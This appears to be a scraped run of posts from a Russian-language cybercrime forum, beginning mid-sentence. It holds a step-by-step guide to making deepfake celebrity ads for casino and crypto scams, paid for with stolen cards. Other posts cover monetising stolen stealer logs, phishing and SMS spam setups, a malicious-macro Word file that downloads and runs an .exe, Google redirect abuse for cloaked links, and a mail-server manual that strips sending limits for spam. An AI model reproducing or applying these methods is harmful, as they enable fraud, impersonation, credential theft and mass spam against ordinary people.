политиков, но важный момент, старайтесь не делать ничего универсального по
типу Мистера Биста на все гео которые льете, да он может хорошо заходить, но
качество будет страдать. Делайте локально, при хороших поисках , всегда кто-то
найдется, к ним больше доверия будет.
Сейчас мы остановимся на музыке, есть национальные звезды, практически в
каждой стране и вы должны понимать что аудитория у них разная, к примеру Алла
Пугачева и Егор крид, тут уж сами думайте кто вам нужен. Мы открываем Spotify
и смотрим топ 50 треков по целевому гео, ищем тех кто прям занимает много
позиций, держа в уме его потенциальную аудиторию.
Выбрали персонажа, отлично. Идем в ютуб, его соцсети, ищем интервью с ним.
Теперь самое муторное для меня, это вырезать его чистый голос с этого
интервью.
Я работаю в программах Movai Suite, стоит недорого, для просто обывателя все
понятно. Вырезаем его голос из интервью, хотя бы на 10 минут. Сохраняем файл,
в том же Movavi suite есть программа Video Converter, там я разбиваю эти 10
минут на 30 секундные аудиофайлы формата Wav и сохраняю.
Потом нам понадобится подписка в elevenlabs.io - туда мы загружаем эти
фрагменты с голосом для клонирования. Клонируем и сохраняем голос. Если
говорить о клонировании голоса, то elevenlabs как будто бы лучший инструмент
на рынке, касаемо именно количества поддерживаемых языков. Если вам нужен
только английский язык - попробуйте play.ht, клонирует в разы лучше, но пока
не поддерживает что-либо кроме английского, хотя обещают добавить позже.
Ок, голос клонировали, возвращаемся в Movavi, теперь нам нужен видеоряд, это
может быть из того же интервью, либо может быть вы нашли что-то другое с этим
же персонажем. Отобрали видео ряд, при обрезке, учивывайте момент чтобы ваш
персонаж всегда смотрел ровно и его губы хорошо читались, не всегда конечно
есть такая возможность, но это отобразиться на качестве. Вы все нарезали,
допустим 20-30 нужных вам секунд, дальше - удаляем к херам фон и оставляем
нашего персонажа на черном фоне с возможностью масштабирования картинки. в
Movavi 2024 это можно сделать прям в софте, если вы взяли что-то дешевое, или
пользуетесь чем то другим, не важно, могу посоветовать - app.runwayml.com,
отлично удаляет фон на видео онлайн, также можно оплатить каржем)
Ок у вас все готово, вы клонировали голос, сделали нарезку с персонажем, далее
вы уже работаете над своим креативом, добавляете текст если это нужно, фон на
котором будет ваш персонаж, какую то графику, лого, если это казино - слоты,
если это крипта - платформа, в общем, чтобы на вашем креативе был не только
персонаж. https://elements.envato.com, вот тут есть подписка на различные
стоковые фото, видео, звуки, я себе каржем оплатил годовой тариф и качаю что
нужно, также, была у меня карта, я с нее потратил где то пару тысяч $ в adobe
stock, выкачал что мне было нужно, фоны, видео под казино, какую то графику,
могу сказать точно, adobe stock вам точно не нужен за свои бабки, смотрите на
первый вариант envato, дешево и сердито.
Добавили, сохранили. Теперь нам нужен голос и губы.
Идем в Elevenlabs, пишем текст под длину нашего креатива (если видео идет 15
секунд то и текст должен быть 15 секунд), естественно с голосом нашего
персонажа. Тестируем разные настройки, варианты, то что нравится - сохраняем.
Так, у нас есть видео с персонажем и готовый голос, вы конечно можете заколхозить и даже возможно что ваш текст будет временами попадать в такт губ, и такое тоже работает но, в идеале, нам нужно сделать так называемый LypSinc, я это делаю вот здесь - https://app.synclabs.so/, но их там кажется взломали или что-то произошло, не факт что у вас получится зарегаться. Делают очень хорошо и качественно, подписка стоит 20$, тоже можно и карж) Второй вариант, но он работает хуже это - thinkdiffusion.com, там пополняете свой счет , берут оплату за пользование их серверами поминутно кажется. Не буду подробно расписывать как там все делается, запускаете их машину, берите самый мощный вариант за 1.75$ в час, там находите Wav2LipStudio , добавляете файл с видео и файл с голосом и создаете ваш креатив.
По итогу , у вас есть готовый креатив с персонажем под целевое гео, который говорит нужный вам текст и если все сделано правильно и качественно, все это выглядит максимально похоже. Мне в комментариях на фб часто пишут какой персонаж падла, ведь он мусульманин и рекламирует казино, часть людей конечно видят подвох, но это в любом случае не наша Ца, не забываем что наша ЦА лохи, которые делают то что нужно нам.
Кажется, как будто бы перечислил основные подходы, конечно если подумать,
можно найти и добавить много чего разного , даже под гемблу и крипту, кто-то
льет просто на картинки, кто-то вообще не заморачивается и берет первые крео
из спая.
Надеюсь этот текст будет полезен для кого то из вас. Быть может добавите что-
то новое, частенько, особенно перед сном приходят разные мысли по креативам,
что можно протестировать, что добавить и т.д., может быть буду что-то
накидывать и сюда.
Всем добра.
Вот есть у меня лог, захожу по кредам не пускает, провайдер пишет, как правильно отрабатывать есть мануал какой нибудь?
Посоветуйте, куда и как правильно можно сливать большие объемы трафика из Telegram? Больше интересуют серо\черные и скам тематики
в 30 лет решил поменять кардинально жизнь и с ноги ворваться в мир it ,но пройдя несколько бесплатных курсов понял что вся белая тема скучная да и что бы там нормально зарабатывать должно пройти много время , сейчас стало интересно познавать темную сторону всемирной паутины , как то у вас тут интереснее ) но есть одна проблема мои скилы на уровне переустановки винды заканчиваются (! и в чем собственно вопрос стоит ли пытаться искать себя тут или для динозавров вход сюда закрыт? темы которые интересуют в первую очередь (спам,фишинг, да и вообще все где можно заработать и не умереть от скуки ) буду признателен правильному совету во всех смыслах !может есть примеры похожие на мой случай , или с чего можно начать, может какой то тиме нужен стажер !
Hi
i need some help regarding why my bot thats on win 10 always knocks from panel when trying to execute an file on system.
is it a admin priv problem
is it a group policy setting?
does the binary needs to be signed with certificate to succesfully be executed?
if someone knows what can be problem please pm me.
Доброго времени суток, Бандиты и Бандитки!
Арбитражем занимаюсь 18 лет. Есть своя команда. Наиболее сильная сторона Google Ads, по одной простой причине - в нем больше трафа, следовательно чаще с ним практикуюсь, но с Бинга тоже ***заливаюсь свободно (последние обновления преодолел). С Яндексом раньше работал плотно, лил около 7 лет, есть понимание работы алгоритмов системы, знаю много лазеек и обходок (разумеется такими фишками поделиться не готов). Не буду выдумывать цифры но пролил бесчисленно количество направлений, в арбитраже чувствую себя как рыба в воде
По мере возможности с удовольствием отвечу на Ваши вопросы. Особенно буду рад подсказать что-то новичкам. Разобрав детально ситуацию могу помочь выявить причины блокировки аккаунтов (но не всегда, т.к. иногда причины слишком абсурдны и кроме того может быть слишком много факторов которые ведут к блокировке, если у меня банят аккаунт то я практический всегда точно знаю по какой причине).
Важно! Я не занимаюсь обучением, я не занимаюсь индивидуальными консультациями, отвечаю только в топике в личку прошу не беспокоить. Благодарю за понимание!
Are you curious about how to generate traffic usingSPAMtechniques?
Whether it 's SMS, Email, SMTP, Host, or Domain, there 's a lot to
explore and understand. SPAM, despite its negative connotations, can
sometimes be a misunderstood tool in digital marketing. It 's crucial to
approach it with caution and knowledge to avoid legal repercussions and
maintain your reputation.
**
SMS SPAMinvolves sending unsolicited text messages to a large number of
recipients. This method can be effective if done correctly, but it 's
important to comply with regulations to avoid fines.
**
**Email SPAMis perhaps the most well-known form ofSPAM. It
involves sending unsolicited emails, often with promotional content. Crafting
compelling subject lines and engaging content can increase open rates, but be
aware of anti-spam laws likeCAN-SPAM Act.
**
SMTP(Simple Mail Transfer Protocol) is a protocol for sending emails.
Understanding how to set up and manage anSMTPserver can enhance your
email marketing efforts, ensuring your emails reach the intended recipients.
**
Hosting and Domainmanagement play a critical role
inSPAMoperations. A reliable host ensures your website stays online,
and a carefully chosen domain can lend credibility to your emails, making them
less likely to be flagged asSPAM.
**
Feel free to leave a comment if you know something about these techniques or
if you have any questions. Sharing your knowledge or seeking advice can help
us all better understand the intricacies of traffic generation through SPAM.
Let 's engage in a productive discussion and learn from each other's
experiences.
**
Have any insights or need more information? Drop a comment below! Whether you
're an expert or a beginner, your input is valuable. Let's navigate the world
of SPAM together!**
Хочу научиться лить Логи (Европы и других недружественных стран)
Ищу человека который тоже интересуется + занимается данной темой и хочет
поработать и нацелен на результат
Если есть желание затимиться, поработать вместе, попробовать реализовать идем
и прочее - велком в ЛС
Просьба писать адекватным людям которых тоже интересует данная тема и они
хотят добиться результата
Если тоже мечтаешь добывать логи как и я просто напиши мне(Мамкины скамеры не
тратте мое и ваше время, х#й что выйдет)
Чуть-чуть обо мне: имеется стартер-пак знаний темщика, пробовал проливать
через адс.ютуб, добывал логи спамом. Со всеми терминами знаком, имеется
определенный опыт и прочее
Уделяю много времени работе, не боюсь поражений, готов достигать целей,
некоторый бюджет есть
Просто хочу рядышком какого-нибудь адекватного заинтересованного человека с кем можно пошевелиться в данной теме
(Просьба скамерсантам не тратить свое и мое время, у вас все равно ничего не
получится)
(прошу прощения если перепутал топик)
Телега - @Armor_King88
Просьба не засорять тему фигней, спасибо!
Здравствуйте форумчане, подскажите, может кто знает как справиться с алертом такого вида?
Всем привет, почти год проливаю траф с ФБ, понимаю как работает траф, но с монетизацией своих навыков есть проблемы, подскажите , друзья, в какую сторону развиваться? Заранее всем спасибо за ответы, надеюсь обойдемся без негатива)
Доброго времени суток , решил попробовать пролиться на фб на серые и черные
офферы .
Первый опыт был пролива на прилку под казыч пл , потратил 30 евро и пролился в
минус
После этого решил попробовать дрейнер , пролил гео европу , было 12 коннектов
кошельков , но все без баланса
Параллельно запустил фиш стима , там вообще плачевно , кликов мало , логов 0
Поэтому такой вопрос , что лучше льётся для черных офферов , фиши СС или
инсталлы?
Ищу единомышлеников для обмена опытом, идеями. Накопилось за несколько лет
много опыта, но сейчас есть и некоторые сложности в работе.
Работаю с Facebook, GoogleAds, TiktokAds.
**Как запустить эффективную рекламу и составить рабочую стратегию маркетинга?
План для начинающего бизнесмена**
Планирование и реализация эффективной маркетинговой стратегии играют ключевую роль в успехе любого бизнеса. Начинающим бизнесменам нужно осознать важность маркетинга и разработать детальный план действий для привлечения клиентов и продвижения своей марки.
Вот несколько основных шагов и задач, которые нужно выполнить при запуске своей маркетинговой стратегии и рекламы
Хорошая реклама образовывает людей, только и всего. Невозможно одурачить людей в этом бизнесе. Продукты говорят сами за себя.
Click to expand...
Исследование рынка и целевой аудитории
Анализ конкурентов:
Изучение потребностей целевой аудитории:
Сбор данных:
Создание покупательского образа:
Анализ результатов:
Важно не только собрать данные, но и правильно интерпретировать их. Не забывайте обновлять свой анализ рынка и целевой аудитории в соответствии с изменениями в индустрии и потребительском поведении. Используйте различные методы исторического исследования, такие как анализ трендов и статистических данных.
Разработка проекта/марки/бренда и уникального предложения
****
Определение ценностей бренда:
Создание уникального предложения:
Тестирование и анализ:
Будьте конкретными и четкими в формулировке уникального предложения.
Не бойтесь экспериментировать и адаптироваться в процессе разработки
бренда, чтобы он лучше соответствовал потребностям вашей целевой
аудитории.
Дизайн — это не то, как предмет выглядит, а то, как он работает.
Click to expand...
Создание маркетингового плана
Определение целей:
Определить основные цели вашего бизнеса, такие как увеличение продаж, повышение узнаваемости бренда, привлечение новых клиентов.
Сформулировать эти цели конкретно, измеримо, достижимо, значимо и ограничено по времени (SMART).
Выбор маркетинговых каналов:
Изучить характеристики вашей целевой аудитории, чтобы определить наиболее эффективные каналы коммуникации.
Рассмотреть различные варианты каналов маркетинга.
Разработка стратегий и тактик:
Разработать стратегии для каждой из выбранных целей, например, стратегию увеличения узнаваемости бренда или стратегию привлечения новых клиентов.
Определить конкретные тактики и инструменты, которые будут использоваться для реализации каждой стратегии. Например, создание контент-плана для социальных сетей или запуск рекламной кампании в Google Ads.
Определение бюджета:
Оценить доступные финансовые ресурсы и определить бюджет, который вы готовы выделить на маркетинг.
Распределить бюджет между выбранными каналами и стратегиями, учитывая их эффективность и целевые показатели.
Мониторинг и анализ:
Будьте гибкими и готовыми к изменениям в вашем маркетинговом плане в
зависимости от обстоятельств.
Сосредоточьтесь на каналах и стратегиях, которые наиболее эффективны для
вашего бизнеса и вашей целевой аудитории.
Не забывайте о регулярном обновлении и адаптации вашего маркетингового
плана в соответствии с изменениями на рынке и поведением потребителей.
Лучше взять и изобрести завтрашний день, чем переживать о том, что вчерашний был так себе.
Click to expand...
Каналы рекламы
Современный бизнес может использовать разнообразные каналы рекламы для привлечения клиентов и продвижения своих продуктов или услуг.
Каждый из этих каналов имеет свои особенности и преимущества, поэтому важно выбирать те, которые наиболее подходят для вашей целевой аудитории.
Оптимизация вашего проекта
****
Анализ текущего проекта:
Оцените текущее положение вашего проекта, включая веб-сайт, социальные сети, и другие онлайн платформы.
Исправление ошибок и улучшение:
Исправьте любые ошибки на вашем веб-сайте, такие как нерабочие ссылки или устаревший контент. Обновите дизайн и функциональность, чтобы сделать его более привлекательным и удобным для пользователей.
Оптимизация контента:
Создайте качественный и релевантный контент для вашего веб-сайта и социальных сетей, который будет интересен вашей целевой аудитории. Оптимизируйте контент с учетом ключевых слов и запросов, чтобы улучшить позиции в поисковой выдаче.
Управление репутацией:
Отслеживайте отзывы и комментарии о вашем проекте в интернете и реагируйте на них своевременно. Создайте стратегию управления репутацией, чтобы поддерживать положительное впечатление о вашей компании.
Развитие веб-сайта:
Разработайте мобильно-адаптивную версию вашего веб-сайта, чтобы обеспечить удобство использования на различных устройствах.
Мониторинг и анализ:
Отслеживайте посещаемость вашего веб-сайта, вовлеченность аудитории и другие метрики, чтобы оценить эффективность вашего проекта. Анализируйте полученные данные и вносите корректировки в свою стратегию в соответствии с результатами.
Смерть, наверное, самое лучшее изобретение Жизни. Она — причина перемен. Она очищает старое, чтобы открыть дорогу новому.
Click to expand...
Источник : Кирилл Попов .https://teletype.in/@gengo/ShTRsOYMgIW?ysclid=lv46vpz2ht136401223
Такой лайфхак не встречал на xss.
Думаю многим пригодится в делах.
В чем же суть этой особенности? В Gmail адреса электронной почты с точками считаются уникальными. Это означает, что если вы добавите точки в свой основной адрес, Gmail будет считать его отдельным почтовым адресом, даже если фактически это будет один и тот же почтовый ящик. Например, адрес yurodinvest@gmail.com и yurod.invest@gmail.com будут считаться разными адресами, но все письма, отправленные на оба адреса, будут доставлены вам.
Click to expand...
Тоесть если мы регим 1 gmail адрес test@gmail.com и расставляем точки в разных местах:
test@gmail.com
t.est@gmail.com
te.st@gmail.com
tes.t@gmail.com
для валидаторов email-форм это как бы разные ящики, а все входящие письма по этим адресам попаду в ящик test@gmail.com
Подсмотрел тут.
Привет xss, возникла такая проблема. Отправляю мамонту на gmail с proton mail письмо с .doc файлом с вредоносным макросом который скачивает и запускает .exe с сервера. Письмо не доходит, а на почту приходит сообщение с таким содержанием. Пробовал скидывать запароленный zip, но все тоже самое. Что посоветуете сделать?
Hello members of xss forum!
I am learning everyday about spamming so I dont much experience about
phishing/spamming.
I already got private leads, the phishing website (bank) and I still need to
buy a not flagged domain and configure the antibots & cloudflare.
But I have some questions about sms spamming. I will need to do sms spams and
not email and I dont know how.
Who have experience and would like to help me learn about it (send sms spams) and give me help, would appreciate it guys <3
Thanks for the attention.
Всем привет! В последнее время задумался над идеей с распространением стилера и монетизацией украденного. Какой софт купить, как нагнать трафик (через фб например юзая карженные сс) - знаю. А что до отработки логов? Я это совершенно не умею делать, а доверять это другому человеку не сильно хочется. К тому же в логах самые разные запросы могут быть (гейм, крипта, БА и СС, может еще что то), неужели на каждую категорию свой отраб нужен будет?
Короче основной вопрос: как наиболее эффективно выжать профит с добытых логов?
Господа, нашел на просторах сайт: <https://autobotsoft.com/automation-
software/> (НЕ реклама, сам НЕ пробовал, думайте сами, я НЕ отвечаю, тапками
не
кидайтесь)
Решил поделиться, может кому-то будет интересно, может даже кто-то
протестирует (или уже) и даст комментарий.
Довольно часто создаются темы по поиску траферов на фиши, драйнеры, инсталлы и
прочие интересные офферы, и все пишут, что о % договоримся в лс, собственно
вопрос:
Хотелось бы услышать мнение и траферов и отработчиков БА и кошельков, какое
вознаграждение считается "нормальным", при условии, что трафер работает на
своих акках и льёт уник траф в одни руки?
Остальная техничка на стороне отработчика.
Моё мнение - должен быть фикс учитывающий стоимость акков (если речь о
саморегах), потому что много желающих затестить оффер и 30% от слитого балика.
Поясню: трафер тратится на мат (номера, платёги, прокси etc.) и время на
прогрев акков, + время на работу с оффером, но принимающая сторона может
оказаться некомпетентна в отработке (поэтому должен быть фикс)...
В свою очередь партнёр тратит деньги на выводные акки и работу с логами, +
решает вопросы с самим оффером (вайты, домены, серты, кло, малварь etc.), что
тоже является затратным мероприятием, поэтому % больше.
А как работаете вы?
Есть ли смысл лить трафф на стилл точечно? То есть общением в дс/тг. Разумеется не СНГ. Или же все-таки не так уж и профитно, и лучше заострить внимание на гугл эдс, бинг и прочих. Мой бюджет - 100$. До этого лил ютуб, но для ютуба щас нужны галки и это оч грустно.
Здравствуйте!
Очень много прилетает вопросов про установку CSA чекера.
Не сильно понимаю в чем сложность, но решил выложить видеоинструкцию, может,
будет полезно.
Решили немного приоткрыть завесу того, какими ссылками мы пользуемся для слива рекламы с ФБ, один из методов это использование редиректа с помощью google. Еще во времена жестощайших банов, когда все арбитраны закупали домены с историей, мы юзали этот метод, Но есть один огромный минус, но о нем позже)
Для того, чтобы сделать редирект с помощью google нам потребуется:
Переходим по ссылке:
https://mail.google.com/mail/u/0/?compose=new#inbox?compose=new
у нас
откроется форма
В «Получатели» мы пишем адрес своей электронной почты, с того аккаунта, с которого сидим.
В теле письма, мы вставляем наши заклоаченные ссылки для слива трафа.
И нажимаем кнопку «Отправить»
К нам в почтовый ящик приходит наше же письмо, но уже с кликабельными ссылками, выглядит это вот так:
Следующий шаг, открываем исходный код страницы или исходный код элемента и
ищем data-saferedirecturl=
И получаем ссылку с гугла с редиректом на нашу заклоаченную ссылку:
https://www.google.com/url?q=https://whitegen.nppr.team&source=gmail&ust=1598641763499000&usg=AFQjCNGfaYByyvaqvTCnCBHlfi7hP7FEug
Теперь, мы можем менять в этом редиректе адрес нашей заклоаченной ссылки
(https://whitegen.nppr.team
) на любой другой и редирект будет вести, куда
нам нужно, периодически данные ссылки надо перегенерировать, повторяя заново
все пункты для уникализации хэша, не меняйте его вручную, так как ссылка
превратится в тыкву)
&ust=1598641763499000&usg=AFQjCNGfaYByyvaqvTCnCBHlfi7hP7FEug
У всего этого метода, есть ОДИН ОГРОМНЫЙ МИНУС — ссылка живет не больше
суток. Далее ссылка превращается в тыкву и появляется страница-прокладка, в
которой говорится о том, что сейчас вы перейдете по адресу:
https://whitegen.nppr.team
Подобный метод редиректов, есть еще на ряде сервисов, если будет интерес, то готовы рассказать и о других методах редиректа.
[источник](https://vk.com/@npprteam-sozdaem-trastovyi-redirekt-cherez-servisy- google)
а так же в любом сервисе гугла такой можно сделать(google sites, google chat)
Приветствую тебя дорогой читатель.
Бывает такое что надо быстро поднять WEB проект на PHP или NODEjs, да ещё и с
полноценным почтовым сервером и верным настройкам DKIM, DMARC, SPF.
В этом мануале я расскажу вам как сделать это быстро и просто.
И да, конечно же нас в основном интересует почтовая составляющая.
Что необходимо:
20-30 минут времени
VPS с открытым 25 портом. Для небольших проектов и нагрузок достаточно 2
ядра/2 гига/20-40гб ссд (если мы о технически современных хостерах)
Домен - рекомендую старые добрые TLD - com | net | org | info и так далее
Доступ к редактированию DNS вашего домена
Поехали:
Ставить будем myvestacp
Spoiler: Что это такое?
myVesta is Debian fork of VestaCP that is under development by one of the
VestaCP developers.
В общем поддерживаемый форк старой весты под дебиан.
В DNS вашего домена создаём запись типа "CNAME" для поддомена WWW которая
указывает на ваш домен без WWW
В DNS вашего домена создаём запись типа "А" для домена (условно domain.com)
которая указывает на айпи адрес вашей VPS
В DNS вашего домена создаём запись типа "А" для поддомена на котором будет
висеть панель (условно cp.domain.com) которая указывает на айпи адрес вашей
VPS.
В DNS вашего домена создаём сразу ещё несколько записей типа "А" на почтовые
субдомены (подробней на скрине)
Далее по SSH логинимся в СВЕЖУЮ-Важно! VPS с Debian 11\12
(Выбор чем логиниться оставляю вам, есть PUTTY под винду, есть множество
других клиентов, в том числе под МакОсь. Лично у меня в винде стоит WSL)
ssh root@100.0.0.200
- (тут айпи вашей VPS)
ENTER (Далее в мануале не буду указывать что после ввода команды необходимо
нажать ENTER, думаю это должно быть понятно)
Пасс вводим с клавы или правой кнопки мышки разок щелкнем в терминале после того как скопировали его - пасс виден не будет, как и то что вы его вводите, не пугайтесь.
Обновляем систему
apt update && apt upgrade -y
Ставим несколько нужных пакетов
apt install wget curl sudo nano -y
Для целей безопасности создаем нового юзера с правами sudo и запрещаем логин по SSH для root
adduser newuser
(ну или какой вы хотите юзернейм дать новому пользователю)
Запросит новый пасс, вводим аналогично тому как логинились, то есть не видя
его. (Запишите заранее юзернейм и пасс)
Далее просто жмём ENTER отвечая на вопросы о email, phone и так далее и в
конце отвечая на вопрос "is this information correct" ставим Y и жмём ENTER.
Даём новому пользователю права рута (вернее добавляем его в группу sudo, но
суть от этого не меняется)
usermod -aG sudo newuser
Запрещаем root логин по SSH
nano /etc/ssh/sshd_config
Откроется редактор nano, стрелочками вниз находим строку "PermitRootLogin"
Должно стоять как на примере, то есть "no". Если стоит любое другое значение,
стрелочками на клавиатуре двигаем ползунок к тексту и backspace'ом либо
delete'ом удаляем значение и пишем no.
Далее жмём ctrl+x (одновременно клавиши ctrl и букву X) и внизу появится
вопрос о перезаписи, жмём Y затем ENTER - больше ничего трогать в файле не
надо.
Выйдя обратно в командную строку, вводим для перезагрузки службы SSH
systemctl restart sshd
Ставим саму панель управления
Скачиваем скрипт установки:
curl -O https://c.myvestacp.com/vst-install-debian.sh
Запускаем скрипт установки:
bash vst-install-debian.sh
Спустя короткое время появится вот такой баннер в консоли:
И под ним, один за другим появятся вопросы (как только вы ответите на один, появится следующий и так далее):
Разберём вопросы:
Would you like to continue [y/n]: - конечно же жмём y и ENTER (далее после каждого ответа жмём ENTER)
Please enter admin email address: - вводим адрес электронной почты для админ аккаунта
Please enter secret URL address for hosting panel (or press enter for none).
Secret URL must be without special characters, just letters and numbers.
Example: mysecret8205
Enter secret URL address: - вводим так называемый секретный урл (это цифро
буквенное значение которое будет идти следом за доменом с портом, по которому
вы будете заходить в дальнейшем в свою панель)
Please enter Vesta port number (press enter for 8083): - Здесь можно указать порт по которому вы будете заходить в панель, советую просто нажать ENTER, оставив порт 8083 по умолчанию.
Please enter FQDN hostname: - сюда вводим наш домен с субдоменом (sub.domain.com), который ещё в начале направили на ip адрес записью типа "A" в DNS вашего домена.
Нажимая ENTER после крайнего вопроса, пойдёт процесс установки, оставляем SSH
соединение открытым и ждём минут 10.
По окончанию установки, в консоли вы увидите примерно следующее:
https:// cp.domain4xssmanual.com:8083/?secreturl100000000000
username: admin
password: DD0bBF2N4v2oyPxGMNGxm6seSSSkVt0t
Обязательно! Скопируйте данную информацию и сохраните, так как вы более не
увидите нигде свой пароль, а secret url придётся находить командой.
Не выходим из SSH!
Сразу проведём несколько корректировок панели:
Ставим несколько версий PHP (По умолчанию там 7.4, она давно морально
устарела):
Качаем скрипт:
wget -nv -O ./vesta-inst-php.sh https://c.myvestacp.com/tools/multi-php- install.sh
Редактируем:
mcedit ./vesta-inst-php.sh
Практически в начале открытого файла, будут следующие строки:
inst_56=0
inst_70=0
inst_71=0
inst_72=0
inst_73=0
inst_74=0
inst_80=0
inst_81=0
inst_82=0
"0" означает не устанавливать, "1" означает устанавливать
меняем значение - стрелочками на клавиатуре двигаем ползунок к тексту и
backspace'ом либо delete'ом удаляем значение 0 и пишем значение 1
Должно получится вот так:
inst_56=0
inst_70=0
inst_71=0
inst_72=0
inst_73=0
inst_74=1
inst_80=1
inst_81=1
inst_82=1
Сохраняем нажав клавишу F2 затем ENTER и выходим из редактора mcedit нажатием ESC 2 раза.
Запускаем скрипт и ждём окончания установки.
sudo bash ./vesta-inst-php.sh
Далее немного тюнинга почтового сервера
Открываем конфиг:
nano /etc/exim4/exim4.conf.template
Поиск по файлу в редакторе nano осуществляется с помощью клавиш ctrl+w
Находим ограничение на количественную отправку 1 письма:
recipients_max = 15
recipients_max_reject = true
Строки так и находятся одна над другой, просто удалите их - когда ползунок
находится на той строке, что вы хотите удалить, просто нажмите ctrl+k и строка
удалится.
В том же файле находим лимит на отправку почты с PHP скриптов и через встроенный SMTP:
deny message = Web site is sending too much emails [limitlog]: deny / account
/ $authenticated_id / $sender_rate / $sender_rate_period
ratelimit = 40 / 1h / $authenticated_id
И
deny message = Email account is sending too much emails [limitlog]: deny /
email / $authenticated_id / $sender_rate / $sender_rate_period
ratelimit = 40 / 1h / $authenticated_id
В обоих случаях меняем "ratelimit = 40" на "ratelimit = 3600" что равно 1
письму каждую секунду (можно и больше, но и этого хватит за глаза)
Далее жмём ctrl+x (одновременно клавиши ctrl и букву X) и внизу появится
вопрос о перезаписи, жмём Y затем ENTER - больше ничего трогать в файле не
надо.
Перезагружаем почтовую службу:
systemctl restart exim4
Перезагружаем VPS:
reboot
После перезагрузки переходим в браузере в панель
https:// cp.domain4xssmanual.com:8083/?secreturl100000000000
Авторизуемся:
username: admin
password: DD0bBF2N4v2oyPxGMNGxm6seSSSkVt0t
Перед вами будет панель.
Заходим слева в раздел WEB:
Здесь жмём на плюсик "Add web domain"
Появится вот такой раздел панели:
В поле domain добавляем свой домен:
domain4xssmanual. com
ip не трогаем, смотрим чтобы галочки стояли как на скрине - DNS support и MAIL support, жмём зеленую кнопку "Add"
Ждём пару-тройку секунд пока всё добавится
Далее заходим слева в раздел DNS и справа от нашего основного домена выбираем "LIST (сколько-то там) RECORDS":
Попадаем на вот такую страницу:
Теперь ваша задача скопировать себе в DNS вашего домена все пункты, что на
скрине выше, а именно 4 записи типа "TXT" и 1 запись типа "MX".
Удобней это делать перейдя в редактирование каждой отдельной записи - справа
от самой записи кнопка EDIT.
Нажимаем и оказываемся на вот такой странице:
В DNS вашего домена (у регистратора либо у вашего DNS провайдера, не в вашей панели) создаем запись типа "TXT" и копируем значение из поля "Record" (из вашей панели) себе в DNS в качестве субдомена, а значение "ip or value" в соответствующее значение в DNS вашего домена, далее нажимаем в панели кнопку "Back" и проделываем аналогично с остальными тремя записями типа "TXT".
В итоге должно получится как на скрине:
Аналогично с TXT записями, проделываем с MX записью:
Вот так должны выглядеть DNS записи домена по итогу (у регистратора либо у вашего DNS провайдера):
С DNS разобрались, теперь небольшой tweak для доставляемости почты, меняем hostname:
Логинимся по SSH в VPS:
ssh newuser@100.0.0.200
(помним же что в начале создали нового юзера с
правами root)
Переходим в режим рута
sudo su root
запросит пароль, вводим его (пароль вашего newuser)
Редактируем файл hostname:
nano /etc/hostname
Там будет одна единственная строка: cp.domain4xssmanual.com
убираем поддомен, оставляем domain4xssmanual.com
Жмём ctrl+x (одновременно клавиши ctrl и букву X) и внизу появится вопрос о перезаписи, жмём Y затем ENTER
Pедактируем файл hosts
nano /etc/hosts
Изначально он будет выглядеть примерно так (примерно, потому как у вас может
не быть ip6 записей, но они вам не интересны):
Приводим его в следующий вид:
Жмём ctrl+x (одновременно клавиши ctrl и букву X) и внизу появится вопрос о перезаписи, жмём Y затем ENTER
Перезагружаем VPS
reboot
После перезагрузки переходим в браузере в панель.
Будет вот такое предупреждение:
Не обращаем внимание, жмём Advanced и внизу появится ссылка перехода в панель.
Логинимся и переходим слева в раздел Mail:
В разделе mail, справа от вашего основного домена жмём "ADD ACCOUNT +" и попадаем на страницу создания почтовых ящиков:
Здесь в поле "Account" пишем имя ящика (та часть адреса email которая перед
знаком @)
В поле Password пишем пароль либо жмём зеленую ссылку "generate" для генерации
пароля.
Поле справа копируйте целиком, там ваш логин, пароль, ссылка на вэб почту, и данные для доступа через почтовые программы.
При желании, в поле "Send login credentials to email address" можете ввести
любую почту куда вам отправить всё то что справа.
Жмём кнопку "Add"
Повторяем действия на странице где добавляются мейл аккаунты, столько раз, сколько нужно ящиков.
Далее ставим WordPress на основной домен.
Ну или любую другую cms или проект - для этого направляю вас на форум панели
для дальнейших инструкций, а тут расскажу за WP.
Spoiler: Форум панели (не реклама, да там и рекламировать нечего, всё опенсурс)
forum. myvestacp. com
Логинимся в SSH:
ssh newuser@100.0.0.200
(помним же что в начале создали нового юзера с
правами root)
Вводим пароль, жмём ENTER.
Переходим в режим рута:
sudo su root
запросит пароль, вводим его (пароль вашего newuser) и жмём ENTER
Вводим команду установки wp (cms и бд настроятся сами)
sudo /usr/local/vesta/bin/v-install-wordpress domain4xssmanual.com
Ждём чуть-чуть и в консоли появятся данные для входа в WP, копируем, сохраняем, пользуемся.
Письма с wp (да и любой другой cms) будут отправляться через встроенный mail server без дополнительной настройки.
Парам-парам-пам. Всё. Вы прекрасны и у вас теперь полноценный почтовый+web сервер, чёткие настройки DNS и довольно безопасная панель управления всем этим.
P.S. Если интересует только почта и простой html сайт без cms:
Исключаем все действия с поддоменом и вешаем панель на основной домен
Исключаем установку нескольких версий PHP
Исключаем редактирование hostname и hosts
По пути /home/admin/web/domain4xssmanual.com/public_html меняем файл
index.html на свой
P.P.S. Подойдёт ли для спама? Да, подойдёт, НО:
Надо греть айпи+домен
Если есть вариант у хостера указать rDNS, то будет лучше, хотя и не
обязательно.
База должна быть валидной и тематической, поскольку чем больше bounce писем,
тем медленнее будет работать отправка, забьётся очередь и прочие неприятные
"радости".
(Если в комментах возникнет достаточно запросов, могу запилить мануал про
авто-прогрев айпи+домена в рамках вышеописанного сетапа).
Всем всего самого светлого и ясного.
Всем привет, предупрежу, что я - выходец с популярного форума зелёного цвета для дошколят.
Пару лет назад лил ютубчик и горя не знал, параллельно делая видосы на заказ
под гейм, крипту итд. Потом эта ниша заполнилась школоло,
и я занимался скамом 1.0. Сейчас, так как скам уже надоел, пробовал криптоскам
по твиттеру, но как по мне показалось что это слишком выебано и хотелось бы
заюзать свои мозги
по максимуму. Умею делать красивые лоадеры, есть опыт работы со стиллерами,
криптом, фш и видеомонтаж.
Главный вопрос: есть ли хорошие невыебанные ниши в 2023 году, которые так
и или иначе связаны с логами (такие как ютуб или криптоскам в твиттере, но не
такие выебанные)? Не учитывая всякие адс-ки, так как для них нужны крупные
вложения на тесты.
Также рассмотрел бы варианты с точечным спамом. СИ на хорошем уровне.
В общем, буду рад любой информации, спасибо за прочтение!
UPD: извиняюсь заранее за нелепое оформление и написание текста, до конца не разобрался как лучше это делать на этом форуме. Также хотел бы добавить, что если у вас есть работа по вышеперечисленным моим возможностям, то welcome мне в PM, буду рад рассмотреть различные варианты и помочь вам в вашем деле!
